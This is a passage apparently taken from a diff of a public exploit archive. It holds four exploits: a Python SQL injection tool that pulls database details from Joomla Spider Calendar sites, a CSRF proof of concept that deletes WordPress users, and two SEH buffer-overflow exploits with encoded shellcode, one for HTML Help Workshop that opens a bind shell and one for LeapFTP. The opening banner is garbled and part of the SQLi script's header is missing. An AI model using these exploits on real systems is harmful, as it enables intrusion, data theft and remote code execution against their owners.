$$\ $$ |$$ / $$ |$$ / $$ |$$ / $$ / $$ |$$ | $$$$$$$ | \____$$\ $$ / $$ |$$ |$$ / $$ |$$$$$$$$ |$$ | \__|
$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ |$$ |$$ __$$ | $$\ $$ |$$ | $$ |$$ |$$ | $$ |$$ ____|$$ |
\$$$$$$ |\$$$$$$ |\$$$$$$ |$$ | $$ | $$ |$$ |\$$$$$$$ | \$$$$$$ |$$$$$$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$ |
\______/ \______/ \______/ \__| \__| \__|\__| \_______| \______/ $$ ____/ \__| \_______| \_______|\__|
$$ |
$$ |
\__|
$$$$$$\ $$\ $$\ $$$$$$\ $$$$$$\ $$$$$$\
$$ __$$\ $$ | $$ | $$ ___$$\ $$ __$$\ $$ __$$\
$$ / \__| $$$$$$\ $$ | $$$$$$\ $$$$$$$\ $$$$$$$ | $$$$$$\ $$$$$$\ \_/ $$ | \__/ $$ | $$ / \__|
$$ | \____$$\ $$ |$$ __$$\ $$ __$$\ $$ __$$ | \____$$\ $$ __$$\ $$$$$ / $$$$$$ | $$$$$$$\
$$ | $$$$$$$ |$$ |$$$$$$$$ |$$ | $$ |$$ / $$ | $$$$$$$ |$$ | \__| \___$$\ $$ ____/ $$ __$$\
$$ | $$\ $$ __$$ |$$ |$$ ____|$$ | $$ |$$ | $$ |$$ __$$ |$$ | $$\ $$ | $$ | $$ / $$ |
\$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\ $$ | $$ |\$$$$$$$ |\$$$$$$$ |$$ | \$$$$$$ |$$\ $$$$$$$$\ $$\ $$$$$$ |
\______/ \_______|\__| \_______|\__| \__| \_______| \_______|\__| \______/ \__|\________|\__|\______/
j00ml4 Spid3r C4l3nd4r >= 2.x <= 3.2.6 SQLi
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
C0mm4nds = dict()
C0mm4nds['DB VERS'] = 'VERSION'
C0mm4nds['DB NAME'] = 'DATABASE'
C0mm4nds['DB USER'] = 'CURRENT_USER'
com_spidercalendar = "index.php?option=com_spidercalendar&calendar_id=1"
ver_spidercalendar = "administrator/components/com_spidercalendar/spidercalendar.xml"
vuln = 0
def cmdMySQL(cmd):
SqlInjList = [
# SQLi Spider Calendar 2.x
'%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
# SQLi Spider Calendar 3.0
'%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
# SQLi Spider Calendar 3.2.x
'%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
]
return SqlInjList
def checkProtocol(pr):
parsedHost = ""
PORT = m_oOptions.port
if pr[0:8] == "https://":
parsedHost = pr[8:]
if parsedHost.endswith("/"):
parsedHost = parsedHost.replace("/","")
if PORT == 0:
PORT = 443
PROTO = httplib.HTTPSConnection(parsedHost, PORT)
elif pr[0:7] == "http://":
parsedHost = pr[7:]
if parsedHost.endswith("/"):
parsedHost = parsedHost.replace("/","")
if PORT == 0:
PORT = 80
PROTO = httplib.HTTPConnection(parsedHost, PORT)
else:
parsedHost = pr
if parsedHost.endswith("/"):
parsedHost = parsedHost.replace("/","")
if PORT == 0:
PORT = 80
PROTO = httplib.HTTPConnection(parsedHost, PORT)
return PROTO, parsedHost
def connection(addr, url_string):
parsedHost = checkProtocol(addr)[1]
PROTO = checkProtocol(addr)[0]
try:
socket.gethostbyname(parsedHost)
except socket.gaierror:
print 'Hostname could not be resolved. Exiting'
sys.exit()
connection_req = checkProtocol(addr)[0]
try:
connection_req.request('GET', url_string)
except socket.error:
print('Connection Error')
sys.exit(1)
response = connection_req.getresponse()
reader = codecs.getreader("utf-8")(response)
return {'response':response, 'reader':reader}
if __name__ == '__main__':
m_oOpts = optparse.OptionParser("%prog -H http[s]://Host_or_IP [-b, --base base_dir] [-p, --port PORT]")
m_oOpts.add_option('--host', '-H', action='store', type='string',
help='The address of the host running Spider Calendar extension(required)')
m_oOpts.add_option('--base', '-b', action='store', type='string', default="/",
help='base dir joomla installation, default "/")')
m_oOpts.add_option('--port', '-p', action='store', type='int', default=0,
help='The port on which the daemon is running (default 80)')
m_oOptions, remainder = m_oOpts.parse_args()
m_nHost = m_oOptions.host
m_nPort = m_oOptions.port
m_nBase = m_oOptions.base
if not m_nHost:
print(banner)
print m_oOpts.format_help()
sys.exit(1)
print(banner)
if m_nBase != "/":
if m_nBase[0] == "/":
m_nBase = m_nBase[1:]
if m_nBase[-1] == "/":
m_nBase = m_nBase[:-1]
else:
if m_nBase[-1] == "/":
m_nBase = m_nBase[:-1]
m_nBase = '/'+m_nBase+'/'
# Start connection to host for Joomla Spider Calendar vulnerability
response = connection(m_nHost, m_nBase+com_spidercalendar+'%27').values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar+'%27').values()[1]
# Read connection code number
getcode = response.status
print("[+] Searching for Joomla Spider Calendar vulnerability...")
print("[+]")
if getcode != 404:
for lines in reader:
if not lines.find("You have an error in your SQL syntax;") == -1:
print("[!] Boolean SQL injection vulnerability FOUND!")
print("[+]")
print("[+] Detection version in progress....")
print("[+]")
try:
response = connection(m_nHost, m_nBase+ver_spidercalendar).values()[0]
reader = connection(m_nHost, m_nBase+ver_spidercalendar).values()[1]
getcode = response.status
if getcode != 404:
for line_version in reader:
if not line_version.find("<version>") == -1:
VER = re.compile('>(.*?)<').search(line_version).group(1)
VER_REP = VER.replace(".","")
if int(VER_REP[0]) == 1 or int(VER_REP) > 326:
print("[X] VERSION: "+VER)
print("[X] Joomla Spider Calendar <= 1 or >= 3.2.7 are not vulnerable")
sys.exit(1)
elif int(VER_REP[0]) == 2:
print("[+] EXTENSION VERSION: "+VER)
print("[+]")
for cmddesc, cmdsqli in C0mm4nds.items():
try:
response = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[0]).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[0]).values()[1]
getcode = response.status
if getcode != 404:
for line_response in reader:
if not line_response.find("h0m3l4b1t") == -1:
MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
if vuln == 0:
print("[!] "+m_nHost+" VULNERABLE!!!")
print("[+]")
print("[!] "+cmddesc+" : "+MYSQL_VER)
vuln = 1
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
elif int(VER_REP) == 30:
print("[+] EXTENSION VERSION: "+VER)
print("[+]")
for cmddesc, cmdsqli in C0mm4nds.items():
try:
response = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[1]).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[1]).values()[1]
getcode = response.status
if getcode != 404:
for line_response in reader:
if not line_response.find("h0m3l4b1t") == -1:
MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
if vuln == 0:
print("[!] "+m_nHost+" VULNERABLE!!!")
print("[+]")
print("[!] "+cmddesc+" : "+MYSQL_VER)
vuln = 1
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
elif int(VER_REP[0]) == 3:
print("[+] EXTENSION VERSION: "+VER)
print("[+]")
for cmddesc, cmdsqli in C0mm4nds.items():
try:
response = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[2]).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[2]).values()[1]
getcode = response.status
if getcode != 404:
for line_response in reader:
if not line_response.find("h0m3l4b1t") == -1:
MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
if vuln == 0:
print("[!] "+m_nHost+" VULNERABLE!!!")
print("[+]")
print("[!] "+cmddesc+" : "+MYSQL_VER)
vuln = 1
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
else:
print("[-] EXTENSION VERSION: Unknown :(")
sys.exit(0)
if vuln == 0:
# VERSION NOT VULNERABLE :(
print("[X] Spider Calendar patched or SQLi blocked by Web Application Firewall-")
sys.exit(1)
else:
sys.exit(0)
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
# NO SQL BLIND DETECTED
print("[X] Spider Calendar patched or SQLi blocked by Web Application Firewall")
sys.exit(1)
else:
print('[X] URL "'+m_nHost+m_nBase+com_spidercalendar+'" NOT FOUND')
sys.exit(1)

23
platforms/php/webapps/34572.txt Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 - CSRF
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage - http://www.speakdigital.co.uk/
# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
# Version: 1.0
# Tested on: PHP
Description:
This plugin will allow administrator to delete user(s) account by entering
their email address.
Proof of Concept
1. Force the administrator to send below request:
URL :
http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php
METHOD : POST
REQUEST : de-text=<victim email>&submit=Search+and+Delete
* As the result, user with the given email address will be deleted.

76
platforms/windows/local/34489.py Executable file
View file

@ -0,0 +1,76 @@
import subprocess
# Exploit Title: HTML Help Workshop 1.4 - Local Buffer Overflow Exploit (SEH)
# Date: 31/08/2014
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx
# Version: 1.4
# Tested on: Windows XP SP3 / Windows 7 Pro
junk = "A" * 832 # Junk bytes
nseh = "\xeb\x06\xff\xff" # Overwrite next seh, with jump forward (over the next 6 bytes) instruction
seh = "\xd0\x11\x30\x45" # Overwrite seh with POP ECX,POP ESI,RETN from HHA.dll (Universal)
nops = "\x90" * 10 # Nops
#msfpayload windows/shell_bind_tcp EXITFUNC=seh R |
#msfencode -e x86/alpha_mixed -c 1 -b '\x00\x0a\x0d\xff'
shellcode = ("\x89\xe5\xd9\xc4\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x6b\x4c\x79\x78\x4f\x79\x65\x50\x57\x70"
"\x67\x70\x75\x30\x4c\x49\x58\x65\x30\x31\x69\x42\x30\x64"
"\x6c\x4b\x31\x42\x66\x50\x4e\x6b\x46\x32\x66\x6c\x6e\x6b"
"\x66\x32\x44\x54\x4c\x4b\x50\x72\x44\x68\x64\x4f\x68\x37"
"\x50\x4a\x65\x76\x65\x61\x4b\x4f\x46\x51\x4f\x30\x4e\x4c"
"\x55\x6c\x65\x31\x31\x6c\x36\x62\x44\x6c\x55\x70\x6b\x71"
"\x48\x4f\x44\x4d\x55\x51\x79\x57\x39\x72\x68\x70\x33\x62"
"\x66\x37\x6e\x6b\x42\x72\x36\x70\x6e\x6b\x42\x62\x45\x6c"
"\x56\x61\x68\x50\x6c\x4b\x61\x50\x61\x68\x6c\x45\x4f\x30"
"\x31\x64\x72\x6a\x75\x51\x78\x50\x42\x70\x6e\x6b\x30\x48"
"\x42\x38\x4e\x6b\x73\x68\x61\x30\x76\x61\x6e\x33\x69\x73"
"\x47\x4c\x72\x69\x6e\x6b\x77\x44\x4c\x4b\x65\x51\x79\x46"
"\x34\x71\x79\x6f\x50\x31\x4f\x30\x6c\x6c\x7a\x61\x38\x4f"
"\x54\x4d\x57\x71\x68\x47\x77\x48\x79\x70\x54\x35\x7a\x54"
"\x67\x73\x61\x6d\x79\x68\x65\x6b\x61\x6d\x36\x44\x61\x65"
"\x78\x62\x36\x38\x6e\x6b\x42\x78\x64\x64\x53\x31\x49\x43"
"\x63\x56\x4e\x6b\x66\x6c\x52\x6b\x4c\x4b\x53\x68\x35\x4c"
"\x55\x51\x59\x43\x6c\x4b\x43\x34\x6c\x4b\x57\x71\x38\x50"
"\x4c\x49\x72\x64\x77\x54\x51\x34\x53\x6b\x53\x6b\x50\x61"
"\x63\x69\x32\x7a\x42\x71\x59\x6f\x6b\x50\x36\x38\x71\x4f"
"\x71\x4a\x4e\x6b\x75\x42\x48\x6b\x4e\x66\x51\x4d\x43\x58"
"\x56\x53\x56\x52\x55\x50\x75\x50\x43\x58\x52\x57\x73\x43"
"\x45\x62\x61\x4f\x31\x44\x31\x78\x62\x6c\x43\x47\x66\x46"
"\x34\x47\x49\x6f\x5a\x75\x6c\x78\x6a\x30\x46\x61\x37\x70"
"\x63\x30\x34\x69\x4f\x34\x51\x44\x62\x70\x63\x58\x67\x59"
"\x4d\x50\x52\x4b\x43\x30\x39\x6f\x68\x55\x36\x30\x56\x30"
"\x46\x30\x66\x30\x73\x70\x72\x70\x71\x50\x52\x70\x70\x68"
"\x78\x6a\x44\x4f\x49\x4f\x4d\x30\x49\x6f\x49\x45\x6c\x49"
"\x79\x57\x66\x51\x39\x4b\x51\x43\x70\x68\x76\x62\x47\x70"
"\x66\x71\x33\x6c\x6d\x59\x79\x76\x43\x5a\x72\x30\x66\x36"
"\x36\x37\x52\x48\x69\x52\x4b\x6b\x65\x67\x72\x47\x59\x6f"
"\x69\x45\x76\x33\x31\x47\x62\x48\x6d\x67\x39\x79\x45\x68"
"\x79\x6f\x39\x6f\x4a\x75\x32\x73\x42\x73\x30\x57\x73\x58"
"\x44\x34\x4a\x4c\x55\x6b\x68\x61\x39\x6f\x69\x45\x70\x57"
"\x6b\x39\x4a\x67\x32\x48\x63\x45\x50\x6e\x62\x6d\x65\x31"
"\x39\x6f\x6e\x35\x73\x58\x72\x43\x42\x4d\x30\x64\x43\x30"
"\x6e\x69\x5a\x43\x56\x37\x73\x67\x43\x67\x66\x51\x7a\x56"
"\x33\x5a\x52\x32\x71\x49\x33\x66\x48\x62\x4b\x4d\x73\x56"
"\x59\x57\x72\x64\x66\x44\x47\x4c\x66\x61\x57\x71\x4e\x6d"
"\x67\x34\x31\x34\x46\x70\x79\x56\x75\x50\x57\x34\x70\x54"
"\x62\x70\x36\x36\x32\x76\x42\x76\x57\x36\x76\x36\x42\x6e"
"\x63\x66\x33\x66\x73\x63\x30\x56\x32\x48\x50\x79\x78\x4c"
"\x37\x4f\x4f\x76\x39\x6f\x4e\x35\x6c\x49\x79\x70\x50\x4e"
"\x52\x76\x61\x56\x39\x6f\x50\x30\x61\x78\x36\x68\x6d\x57"
"\x67\x6d\x53\x50\x79\x6f\x38\x55\x6d\x6b\x4b\x4e\x66\x6e"
"\x45\x62\x79\x7a\x33\x58\x59\x36\x4e\x75\x4f\x4d\x4d\x4d"
"\x39\x6f\x59\x45\x55\x6c\x56\x66\x33\x4c\x66\x6a\x6f\x70"
"\x79\x6b\x39\x70\x71\x65\x54\x45\x6d\x6b\x53\x77\x37\x63"
"\x73\x42\x42\x4f\x73\x5a\x77\x70\x70\x53\x79\x6f\x49\x45"
"\x41\x41")
exploit = junk + nseh + seh + nops + shellcode
subprocess.call(['C:\\Program Files\\HTML Help Workshop\\hhw.exe ',exploit])
# EOF

69
platforms/windows/local/34512.py Executable file
View file

@ -0,0 +1,69 @@
# Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit
# Google Dork: "k3170makan is totally awesome" hehehe
# Date: 2014-08-28
# Exploit Author: k3170makan
# Vendor Homepage: http://www.leapware.com/
# Software Link: http://www.leapware.com/download.html
# Version: 3.1.0
# Tested on: Windows XP SP0 (DoS on Windows SP2, Windows 7)
# Timeline:
# * 2014-08-28 : Initial contact
# * 2014-09-01 : no contact
# * 2014-09-01 : public disclosure
"""
This vulnerability was disclosed according to the terms of my public
disclosure policy (
http://blog.k3170makan.com/p/public-disclosure-policy.html)
"""
from sys import argv
if __name__ == "__main__":
ovTrigger = 1093
f = open("exploit.txt","w")
f.write("ftp://")
f.write("A"*ovTrigger)
f.write("\xEB\x06\x90\x90") #JMP to payload
f.write("\x44\xD3\x4A\x77") #POP POP RET
f.write("\x90"*30)
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -c 1
-b \x00\x0a\x0d\xff
shellcode = "\x89\xe0\xd9\xe8\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49\x49" +\
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +\
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +\
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +\
"\x42\x75\x4a\x49\x49\x6c\x68\x68\x4f\x79\x35\x50\x53\x30" +\
"\x45\x50\x35\x30\x6e\x69\x79\x75\x30\x31\x6a\x72\x30\x64" +\
"\x4c\x4b\x53\x62\x56\x50\x4e\x6b\x76\x32\x56\x6c\x6c\x4b" +\
"\x42\x72\x62\x34\x6e\x6b\x54\x32\x46\x48\x76\x6f\x6e\x57" +\
"\x61\x5a\x67\x56\x45\x61\x39\x6f\x64\x71\x4b\x70\x4e\x4c" +\
"\x55\x6c\x53\x51\x33\x4c\x67\x72\x76\x4c\x51\x30\x59\x51" +\
"\x38\x4f\x64\x4d\x45\x51\x49\x57\x4d\x32\x58\x70\x56\x32" +\
"\x70\x57\x4e\x6b\x31\x42\x76\x70\x4e\x6b\x61\x52\x47\x4c" +\
"\x73\x31\x5a\x70\x4c\x4b\x57\x30\x53\x48\x6c\x45\x4f\x30" +\
"\x33\x44\x51\x5a\x65\x51\x48\x50\x42\x70\x6e\x6b\x72\x68" +\
"\x67\x68\x6c\x4b\x30\x58\x47\x50\x77\x71\x5a\x73\x49\x73" +\
"\x77\x4c\x71\x59\x6e\x6b\x35\x64\x4e\x6b\x57\x71\x4b\x66" +\
"\x35\x61\x4b\x4f\x34\x71\x4f\x30\x4e\x4c\x59\x51\x4a\x6f" +\
"\x74\x4d\x75\x51\x58\x47\x44\x78\x59\x70\x62\x55\x68\x74" +\
"\x33\x33\x61\x6d\x4b\x48\x65\x6b\x33\x4d\x47\x54\x72\x55" +\
"\x58\x62\x36\x38\x6e\x6b\x32\x78\x35\x74\x55\x51\x4a\x73" +\
"\x73\x56\x4e\x6b\x66\x6c\x72\x6b\x6e\x6b\x71\x48\x77\x6c" +\
"\x47\x71\x78\x53\x6e\x6b\x73\x34\x4e\x6b\x75\x51\x5a\x70" +\
"\x4b\x39\x77\x34\x35\x74\x71\x34\x31\x4b\x51\x4b\x75\x31" +\
"\x71\x49\x70\x5a\x66\x31\x4b\x4f\x39\x70\x43\x68\x43\x6f" +\
"\x53\x6a\x4c\x4b\x42\x32\x38\x6b\x4b\x36\x53\x6d\x42\x4a" +\
"\x36\x61\x4c\x4d\x4b\x35\x68\x39\x65\x50\x35\x50\x55\x50" +\
"\x70\x50\x52\x48\x76\x51\x6c\x4b\x62\x4f\x6c\x47\x79\x6f" +\
"\x6e\x35\x6f\x4b\x4a\x50\x4e\x55\x69\x32\x32\x76\x55\x38" +\
"\x79\x36\x6c\x55\x6f\x4d\x4d\x4d\x6b\x4f\x78\x55\x75\x6c" +\
"\x73\x36\x31\x6c\x57\x7a\x4b\x30\x79\x6b\x49\x70\x70\x75" +\
"\x64\x45\x4f\x4b\x63\x77\x37\x63\x62\x52\x52\x4f\x52\x4a" +\
"\x77\x70\x56\x33\x69\x6f\x4e\x35\x30\x63\x35\x31\x50\x6c" +\
"\x51\x73\x36\x4e\x45\x35\x44\x38\x33\x55\x53\x30\x41\x41"
f.write(shellcode)
f.flush()
f.close()
#copy contents of exploit.txt to your clipboard and then launch LeapFTP
<http://about.me/k3170makan>
Keith Makan <http://about.me/k3170makan>
about.me/k3170makan
<http://about.me/k3170makan>